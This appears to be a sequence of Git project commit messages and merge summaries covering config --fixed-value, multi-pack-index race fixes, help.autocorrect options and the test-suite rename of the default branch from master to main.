In 4e55d19 (git-gui: Cleanup end-of-line whitespace in commit messages.,
2007-01-25), the logic to decide if GITGUI_MSG should be saved or
deleted was updated to not require the commit message buffer to be
modified. This fixes a situation where if the user quits and restarts
git-gui multiple times the commit message buffer was lost.
Unfortunately, the fix was not quite correct. The check for whether the
commit message buffer has been modified is useless. If the commit is
_not_ amend, then the check is never performed. If the commit is amend,
then saving the message does not matter anyway. Amend state is destroyed
on exit and the next time git-gui is opened it starts from scratch, but
with the older message retained in the buffer. If amend is selected,
the current message is over-written by the amend commit's message.
The correct fix would be to not touch GITGUI_MSG at all if the commit
message buffer is not modified. This way, the file is not deleted even
on multiple restarts. It has the added benefit of not writing the file
unnecessarily on every exit.
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
A lazily defined test prerequisite can now be defined in terms of
another lazily defined test prerequisite.
* sg/tests-prereq:
tests: fix description of 'test_set_prereq'
tests: make sure nested lazy prereqs work reliably
Since jgit does not yet work with SHA-256 repositories, mark the
tests that uses it not to run unless we are testing with ShA-1
repositories.
* sg/t5310-jgit-wants-sha1:
t5310-pack-bitmaps: skip JGit tests with SHA256
"git fetch" did not work correctly with nested submodules where the
innermost submodule that is not of interest got updated in the
upstream, which has been corrected.
* pk/subsub-fetch-fix:
submodules: fix of regression on fetching of non-init subsub-repo
The code was not prepared to deal with pack .idx file that is
larger than 4GB.
* jk/4gb-idx:
packfile: detect overflow in .idx file size checks
block-sha1: take a size_t length parameter
fsck: correctly compute checksums on idx files larger than 4GB
use size_t to store pack .idx byte offsets
compute pack .idx byte offsets using size_t
The exchange between receive-pack and proc-receive hook did not
carefully check for errors.
* jx/t5411-flake-fix:
receive-pack: use default version 0 for proc-receive
receive-pack: gently write messages to proc-receive
t5411: new helper filter_out_user_friendly_and_stable_output
"git bisect start/next" in a large span of history spends a lot of
time trying to come up with exactly the half-way point; this can be
optimized by stopping when we see a commit that is close enough to
the half-way point.
* sg/bisect-approximately-halfway:
bisect: loosen halfway() check for a large number of commits
The command line completion script (in contrib/) learned to expand
commands that are alias of alias.
* fc/bash-completion-alias-of-alias:
completion: bash: improve alias loop detection
completion: bash: check for alias loop
completion: bash: support recursive aliases
When a repository's leading directories contain regex metacharacters,
the config calls for 'git maintenance register' and 'git maintenance
unregister' are not careful enough. Use the new --fixed-value option
to direct the config machinery to use exact string matches. This is a
more robust option than escaping these arguments in a piecemeal fashion.
For the test, require that we are not running on Windows since the '+'
and '*' characters are not allowed on that filesystem.
Reported-by: Emily Shaffer <emilyshaffer@google.com>
Reported-by: Jonathan Nieder <jrnieder@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* ds/config-literal-value:
config doc: value-pattern is not necessarily a regexp
config: implement --fixed-value with --get*
config: plumb --fixed-value into config API
config: add --fixed-value option, un-implemented
t1300: add test for --replace-all with value-pattern
t1300: test "set all" mode with value-pattern
config: replace 'value_regex' with 'value_pattern'
config: convert multi_replace to flags
The introductory part of the "git config --help" mentions the
optional value-pattern argument, but give no hint that it can be
something other than a regular expression (worse, it just says
"POSIX regexp", which usually means BRE but the regexp the command
takes is ERE). Also, it needs to be documented that the '!' prefix
to negate the match, which is only mentioned in this part of the
document, works only with regexp and not with the --fixed-value.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The config builtin does its own regex matching of values for the --get,
--get-all, and --get-regexp modes. Plumb the existing 'flags' parameter
to the get_value() method so we can initialize the value-pattern argument
as a fixed string instead of a regex pattern.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The git_config_set_multivar_in_file_gently() and related methods now
take a 'flags' bitfield, so add a new bit representing the --fixed-value
option from 'git config'. This alters the purpose of the value_pattern
parameter to be an exact string match. This requires some initialization
changes in git_config_set_multivar_in_file_gently() and a new strcmp()
call in the matches() method.
The new CONFIG_FLAGS_FIXED_VALUE flag is initialized in builtin/config.c
based on the --fixed-value option, and that needs to be updated in
several callers.
This patch only affects some of the modes of 'git config', and the rest
will be completed in the next change.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'git config' builtin takes a 'value-pattern' parameter for several
actions. This can cause confusion when expecting exact value matches
instead of regex matches, especially when the input string contains
metacharacters. While callers can escape the patterns themselves, it
would be more friendly to allow an argument to disable the pattern
matching in favor of an exact string match.
Add a new '--fixed-value' option that does not currently change the
behavior. The implementation will be filled in by later changes for
each appropriate action. For now, check and test that --fixed-value
will abort the command when included with an incompatible action or
without a 'value-pattern' argument.
The name '--fixed-value' was chosen over something simpler like
'--fixed' because some commands allow regular expressions on the
key in addition to the value.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --replace-all option was added in 4ddba79d (git-config-set: add more
options) but was not tested along with the 'value-pattern' parameter.
Since we will be updating this option to optionally treat 'value-pattern'
as a fixed string, let's add a test here that documents the current
behavior.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Without additional modifiers, 'git config <key> <value>' attempts
to set a single value in the .git/config file. When the
value-pattern parameter is supplied, this command behaves in a
non-trivial manner.
Consider 'git config <key> <value> <value-pattern>'. The expected
behavior is as follows:
1. If there are multiple existing values that match 'value-pattern',
then the command fails. Users should use --replace-all instead.
2. If there is no existing values match 'value-pattern', then the
'key=value' pair is appended, making this 'key' a multi-valued
config setting.
3. If there is one existing value that matches 'value-pattern', then
the new config has one entry where 'key=value'.
Add a test that demonstrates these options. Break from the existing
pattern in t1300-config.sh to use 'git config --file=<file>' instead of
modifying .git/config directly to prevent possibly incompatible repo
states. Also use 'git config --file=<file> --list' for config state
comparison instead of the config file format. This makes the tests
more readable.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'value_regex' argument in the 'git config' builtin is poorly named,
especially related to an upcoming change that allows exact string
matches instead of ERE pattern matches.
Perform a mostly mechanical change of every instance of 'value_regex' to
'value_pattern' in the codebase. This is only critical for documentation
and error messages, but it is best to be consistent inside the codebase,
too.
For documentation, use 'value-pattern' which is better punctuation. This
affects Documentation/git-config.txt and the usage in builtin/config.c,
which was already mixed between 'value_regex' and 'value-regex'.
I gave some thought to leaving the value_regex variables inside config.c
that are regex_t pointers. However, it is probably best to keep the name
consistent with the rest of the variables.
This does not update the translations inside the po/ directory, as that
creates conflicts with ongoing work. The input strings should
automatically update through automation, and a few of the output strings
currently use "[value_regex]" directly.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We will extend the flexibility of the config API. Before doing so, let's
take an existing 'int multi_replace' parameter and replace it with a new
'unsigned flags' parameter that can take multiple options as a bit field.
Update all callers that specified multi_replace to now specify the
CONFIG_FLAGS_MULTI_REPLACE flag. To add more clarity, extend the
documentation of git_config_set_multivar_in_file() including a clear
labeling of its arguments. Other config API methods in config.h require
only a change of the final parameter from 'int' to 'unsigned'.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a packed object is stored in a multi-pack index, but that pack has
racily gone away, the MIDX code simply calls die(), when it could be
returning an error to the caller, which would in turn lead to
re-scanning the pack directory.
A pack can racily disappear, for example, due to a simultaneous 'git
repack -ad',
You can also reproduce this with two terminals, where one is running:
git init
while true; do
git commit -q --allow-empty -m foo
git repack -ad
git multi-pack-index write
done
(in effect, constantly writing new MIDXs), and the other is running:
obj=$(git rev-parse HEAD)
while true; do
echo $obj | git cat-file --batch-check='%(objectsize:disk)' || break
done
That will sometimes hit the error preparing packfile from
multi-pack-index message, which this patch fixes.
Right now, that path to discovering a missing pack looks something like
'find_pack_entry()' calling 'fill_midx_entry()' and eventually making
its way to call 'nth_midxed_pack_entry()'.
'nth_midxed_pack_entry()' already checks 'is_pack_valid()' and
propagates an error if the pack is invalid. So, this works if the pack
has gone away between calling 'prepare_midx_pack()' and before calling
'is_pack_valid()', but not if it disappears before then.
Catch the case where the pack has already disappeared before
'prepare_midx_pack()' by returning an error in that case, too.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 17c35c8969 (packfile: skip loading index if in multi-pack-index,
2018-07-12) we stopped loading the .idx file for packs that are
contained within a multi-pack index.
This saves us the effort of loading an .idx and doing some lightweight
validity checks by way of 'packfile.c:load_idx()', but introduces a race
between processes that need to load the index (e.g., to generate a
reverse index) and processes that can delete the index.
For example, running the following in your shell:
$ git init repo && cd repo
$ git commit --allow-empty -m 'base'
$ git repack -ad && git multi-pack-index write
followed by:
$ rm -f .git/objects/pack/pack-*.idx
$ git rev-parse HEAD | git cat-file --batch-check='%(objectsize:disk)'
will result in a segfault prior to this patch. What's happening here is
that we notice that the pack is in the multi-pack index, and so don't
check that it still has a .idx. When we then try and load that index to
generate a reverse index, we don't have it, so the call to
'find_pack_revindex()' in 'packfile.c:packed_object_info()' returns
NULL, and then dereferencing it causes a segfault.
Of course, we don't ever expect someone to remove the index file by
hand, or to be in a state where we never wrote it to begin with (yet
find that pack in the multi-pack-index). But, this can happen in a
timing race with 'git repack -ad', which removes all existing packs
after writing a new pack containing all of their objects.
Avoid this by reverting the hunk of 17c35c8969 which stops loading the
index when the pack is contained in a MIDX. This makes the latter half
of 17c35c8969 useless, since we'll always have a non-NULL
'p->index_data', in which case that if statement isn't guarding
anything.
These two together effectively revert 17c35c8969, and avoid the race
explained above.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While help.autocorrect can be set to 0 to decline auto-execution of
possibly mistyped commands, it still spends cycles to compute the
suggestions, and it wastes screen real estate.
Update help.autocorrect to accept the string "never" to just exit
with error upon mistyped commands to help users who prefer to never
see suggested corrections at all.
While at it, introduce "immediate" as a more readable way to
immediately execute the auto-corrected command, which can be done
with negative value.
Signed-off-by: Drew DeVault <sir@cmpwn.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When holding the lock for rewriting the credential file, use a timeout
to avoid race conditions when the credentials file needs to be updated
in parallel.
An example would be doing `fetch --all` on a repository with several
remotes that need credentials, using parallel fetching.
The timeout can be configured using "credentialStore.lockTimeoutMS",
defaulting to 1 second.
Signed-off-by: Simão Afonso <simao.afonso@powertools-tech.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The sleep function is defined in wrapper.c, so it makes more sense to be a in
system compatibility header.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Emit a trace2 error event whenever warning() is called, just like when
die(), error(), or usage() is called.
This helps debugging issues that would trigger warnings but not errors.
In particular, this might have helped debugging an issue I encountered
with commit graphs at $DAYJOB [1].
There is a tradeoff between including potentially relevant messages and
cluttering up the trace output produced. I think that warning() messages
should be included in traces, because by its nature, Git is used over
multiple invocations of the Git tool, and a failure (currently traced)
in a Git invocation might be caused by an unexpected interaction in a
previous Git invocation that only has a warning (currently untraced) as
a symptom - as is the case in [1].
[1] https://lore.kernel.org/git/20200629220744.1054093-1-jonathantanmy@google.com/
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A review exchange may begin with a reviewer asking "what did you
mean by this phrase in your log message (or here in the doc)?", the
author answering what was meant, and then the reviewer saying "ah,
that is what you meant---then the flow of the logic makes sense".
But that is not the happy end of the story. New contributors often
forget that the material that has been reviewed in the above exchange
is still unclear in the same way to the next person who reads it,
until it gets updated.
While we are in the vicinity, rephrase the verb "request" used to
refer to comments by reviewers to "suggest"---this matches the
contrast between "original" and "suggested" that appears later in
the same paragraph, and more importantly makes it clearer that it is
not like authors are to please reviewers' wishes but rather
reviewers are merely helping authors to polish their commits.
Reviewed-by: Emily Shaffer <emilyshaffer@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we can override the default branch name in the tests via
`GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME`, we should avoid expecting a
particular hard-coded name.
So let's rename the initial branch immediately to `primary` and work
with that.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 1c1518071c (submodule: use "fetch" logic instead of custom remote
discovery, 2020-11-14) rewrote the logic in fetch_in_submodule to do:
elif test "$2" -ne ""
But this is nonsense in shell: -ne is for numeric comparisons. This
should be "=" or more idiomatically:
elif test -n "$2"
But once we fix that, many tests start failing. Because that commit
introduced another problem. The caller that passes 3 arguments looks
like this:
fetch_in_submodule "$sm_path" $depth "$sha1"
Note the unquoted $depth parameter. When it isn't set, the function will
see only 2 arguments, and the function has no idea if what it sees in $2
is an option to go on the command line, or a refspec to pass on stdin.
In the old code before that commit:
fetch_in_submodule () (
sanitize_submodule_env &&
cd "$1" &&
- case "$2" in
- '')
- git fetch ;;
- *)
- shift
- git fetch $(get_default_remote) "$@" ;;
- esac
we treated those the same, so it didn't matter. But in the new logic
(with my fix above):
+ if test $# -eq 3
+ then
+ echo "$3" | git fetch --stdin "$2"
+ elif test -n "$n"
+ then
+ git fetch "$2"
+ else
+ git fetch
+ fi
we use the number of parameters to distinguish the two. Let's insist
that the caller pass an empty string for positional parameter two if
they want to have a third parameter after it.
But that still leaves one problem. In the --stdin block, we
unconditionally pass "$2" to git-fetch, even if it's the empty string.
Rather than add another conditional, we can use :+ parameter expansion
to include it only if it's non-empty. In fact, we can do the same for
the elif, too, simplifying it further. Technically this is overkill,
since we know the --depth parameter will not have whitespace (and
indeed, most callers do not bother quoting it), but it doesn't hurt for
the function to be careful.
It's somewhat amazing that no tests were failing. I think what happened
is that:
- the 3-arg form rarely triggered; any call with a non-empty $depth
and a $sha1 would work, but one with an empty $depth would only have
2 arguments
- because of the wrong arguments to "test", the shell would complain
and exit non-zero. So we never ran the middle conditional at all
- that left every call running "git fetch" with no arguments. A
well-written test could have detected the distinction here, but in
practice omitting --depth just means fetching more commits, and
fetching everything (rather than a single sha1) works as long as the
commit in question is reachable
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Advanced and expert users may want to know how 'git maintenance start'
schedules background maintenance in order to customize their own
schedules beyond what the maintenance.* config values allow. Start a new
set of sections in git-maintenance.txt that describe how 'cron' is used
to run these tasks.
This is particularly valuable for users who want to inspect what Git is
doing or for users who want to customize the schedule further. Having a
baseline can provide a way forward for users who have never worked with
cron schedules.
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The existing schedule mechanism using 'cron' is supported by POSIX
platforms, but not Windows. It also works slightly differently on
macOS to significant detriment of the user experience. To allow for
new implementations on these platforms, extract a method that
performs the platform-specific scheduling mechanism. This will be
swapped at compile time with new implementations on specialized
platforms.
As we add this generality, rename GIT_TEST_CRONTAB to
GIT_TEST_MAINT_SCHEDULER. Further, this variable is now parsed as
"<scheduler>:<command>" so we can test platform-specific scheduling
logic even when not on the correct platform. By specifying the
<scheduler> in this string, we will be able to test all three sets of
Git logic from a Linux machine.
Co-authored-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Restore a space that was lost in 8a0fc8d19d (stash: convert apply to
builtin, 2019-02-25).
Signed-off-by: Kyle Meyer <kyle@kyleam.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If notes.displayRef is configured with no value[1], control should be
returned to the caller when notes.c:notes_display_config() checks if 'v'
is NULL. Otherwise, both git log --notes and git diff-tree --notes will
subsequently segfault when refs.h:has_glob_specials() calls strpbrk()
with a NULL first argument.
[1] Examples:
.git/config:
[notes]
displayRef
$ git -c notes.displayRef [...]
Signed-off-by: Nate Avers <nate@roosteregg.cc>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix regression introduced when nvimdiff support in mergetool was added.
* pd/mergetool-nvimdiff:
mergetool: avoid letting `list_tool_variants` break user-defined setups
mergetools/bc: add `bc4` to the alias list for Beyond Compare
A specialization of hashmap that uses a string as key has been
introduced. Hopefully it will see wider use over time.
* en/strmap:
shortlog: use strset from strmap.h
Use new HASHMAP_INIT macro to simplify hashmap initialization
strmap: take advantage of FLEXPTR_ALLOC_STR when relevant
strmap: enable allocations to come from a mem_pool
strmap: add a strset sub-type
strmap: split create_entry() out of strmap_put()
strmap: add functions facilitating use as a string->int map
strmap: enable faster clearing and reusing of strmaps
strmap: add more utility functions
strmap: new utility functions
hashmap: provide deallocation function names
hashmap: introduce a new hashmap_partial_clear()
hashmap: allow re-use after hashmap_free()
hashmap: adjust spacing to fix argument alignment
hashmap: add usage documentation explaining hashmap_free[_entries]()
Running "git diff" while allowing external diff in a state with
unmerged paths used to segfault, which has been corrected.
* jk/diff-release-filespec-fix:
t7800: simplify difftool test
diff: allow passing NULL to diff_free_filespec_data()
"git rev-parse" learned the "--end-of-options" to help scripts to
safely take a parameter that is supposed to be a revision, e.g.
"git rev-parse --verify -q --end-of-options $rev".
* jk/rev-parse-end-of-options:
rev-parse: handle --end-of-options
rev-parse: put all options under the "-" check
rev-parse: don't accept options after dashdash
The maximum length of output filenames "git format-patch" creates
has become configurable (used to be capped at 64).
* jc/format-patch-name-max:
format-patch: make output filename configurable
In 15fabd1bbd ("builtin/grep.c: make configuration callback more
reusable", 2012-10-09), we learned to fill a `static struct grep_opt
grep_defaults` which we can use as a blueprint for other such structs.
At the time, we didn't consider designated initializers to be widely
useable, but these days, we do. (See, e.g., cbc0f81d96 ("strbuf: use
designated initializers in STRBUF_INIT", 2017-07-10).)
Use designated initializers to let the compiler set up the struct and so
that we don't need to remember to call `init_grep_defaults()`.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`init_grep_defaults()` fills a `static struct grep_opt grep_defaults`.
This struct is then used by `grep_init()` as a blueprint for other such
structs. Notably, `grep_init()` takes a `struct repo *` and assigns it
into the target struct.
As a result, it is unnecessary for us to take a `struct repo *` in
`init_grep_defaults()` as well. We assign it into the default struct and
never look at it again. And in light of how we return early if we have
already set up the default struct, it's not just unnecessary, but is
also a bit confusing: If we are called twice and with different repos,
is it a bug or a feature that we ignore the second repo?
Drop the repo parameter for `init_grep_defaults()`.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We spawn an external pack-objects process to actually send
objects to the remote side. If we are killed by a signal
during this process, the pack-objects will keep running and
complete the push, which may surprise the user. We should
take it down when we go down.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git worktree add` (without --force) errors out when given a path
that is already registered as a worktree and the path is missing on
disk. But the `cmd` and `path` strings are switched on the error
message. Let's fix that.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As noted in an earlier change the keep_base_pack variable name is a
relic from an earlier on-list version of ae4e89e549 ("gc: add
--keep-largest-pack option", 2018-04-15) before it was renamed to
--keep-largest-pack.
Let's change the variable name to avoid that confusion, it's easier to
read the code if there's a 1=1 mapping between the variable name and
option name.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --keep-base-pack option never existed in git.git. It was the name
for the --keep-largest-pack option in earlier revisions of that series
before it landed as ae4e89e549 ("gc: add --keep-largest-pack option",
2018-04-15).
The later patches in that series[1][2] weren't changed to also refer
to --keep-largest-pack, so we've had this reference to a nonexisting
option ever since the feature initially landed.
1. 55dfe13df9 ("gc: add gc.bigPackThreshold config", 2018-04-15)
2. 9806f5a7bf ("gc --auto: exclude base pack if not enough mem to
"repack -ad"", 2018-04-15)
Reported-by: Luc Van Oostenryck <luc.vanoostenryck@gmail.com>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We introduced the `PREPARE_FOR_MAIN_BRANCH` prereq for the sole purpose
of allowing us to perform the non-trivial adjustments regarding the
`master` -> `main` rename before the automatable ones.
Now that the transition is almost complete, we can stop using it in most
instances. The only two exceptions are t5526 and t9902: at the time of
writing, there are other patches in flight that touch these test
scripts, therefore their transition to `main` is postponed to a later
date.
This patch is the result of this command:
sed -i 's/PREPARE_FOR_MAIN_BRANCH[ ,]//' t/t[0-9]*.sh &&
git checkout HEAD -- t/t5526\* t/t9902\*
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t9902, which sees independent development elsewhere
at the time of writing, we use `main` as the default branch name in
t9903. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t99*.sh lib-cvs.sh &&
git checkout HEAD -- t9902\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for all tests (except the ones we specifically excluded for now).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the previous commits, we adjusted the test suite to use the branch
name `main` for initial branches.
The `git p4`-related tests are a bit harder to adjust because `git p4`
uses the ref `refs/heads/p4/master` to track the remote branches, and
for now, we do not want to change that (this might be the subject of a
future patch series). We only need to adjust for the actual initial
branch name to be changed to `main`.
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t9[5-7]*.sh lib-cvs.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t9[0-4]*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t8*.sh annotate*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Excluding t7817, which is added in an unrelated patch series at the time
of writing, this adjusts t7[5-9]*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t7[5-9]*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t7064, which sees independent development elsewhere
at the time of writing, we use `main` as the default branch name in
t7[0-4]*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t7[0-4]*.sh &&
git checkout HEAD -- t7064\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t6[4-9]*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are in the process of renaming the default branch name to `main`,
which is two characters shorter than `master`. Therefore, some lines
need to be adjusted in t6416, t6422 and t6427 that want to align text
involving the default branch name.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t6300, which sees independent development elsewhere
at the time of writing, we use `main` as the default branch name in
t6[0-3]*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t6[0-3]*.sh &&
git checkout HEAD -- t6300\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t5[6-9]*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -e 's/retsam/niam/g' \
-- t55[4-9]*.sh t556x*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Note that t5541 uses the reversed `master` name: `retsam`. We replace it
by the equivalent for `main`: `niam`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t5526, which sees independent development elsewhere
at the time of writing, we use `main` as the default branch name in
t55[23]*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -e 's/naster/nain/g' -- \
t55[23]*.sh &&
git checkout HEAD -- t5526\*)
Note that t5533 contains a variation of the name `master` (`naster`)
that we rename here, too.
This commit allows us to define
`GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main` for that range of tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t551*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t550*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In an upcoming commit, we will use `main` as the default branch name in
t5503 instead of `master`. This will require extra padding in ASCII-art
commit graphs, which we hereby add preemptively.
By doing this preemptively rather than after the commit applying the
search-and-replace, it is more obvious that we caught all aligned
comments that are affected by the latter commit.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t5310, which is developed independently of the
current patch series at the time of writing, we now use `main` as
default branch in t5[0-4]*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t5[0-4]*.sh &&
git checkout HEAD -- t5310\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are about to search-and-replace all mentions of `master` in t5323 by
`main`, which is two characters shorter. To prepare for that, let's add
padding to centered lines that will make them briefly uncentered, but
will be re-centered in the commit that performs that rename.
Doing it this way (instead of padding after replacing) makes it easier
to verify the validity of the patch that replaces `master` by `main`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t4013 and t4015, which see independent development
elsewhere at the time of writing, we use `main` as the default branch
name in t4*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t4*.sh t4211/*.export &&
git checkout HEAD -- t4013\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t3[5-9]*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
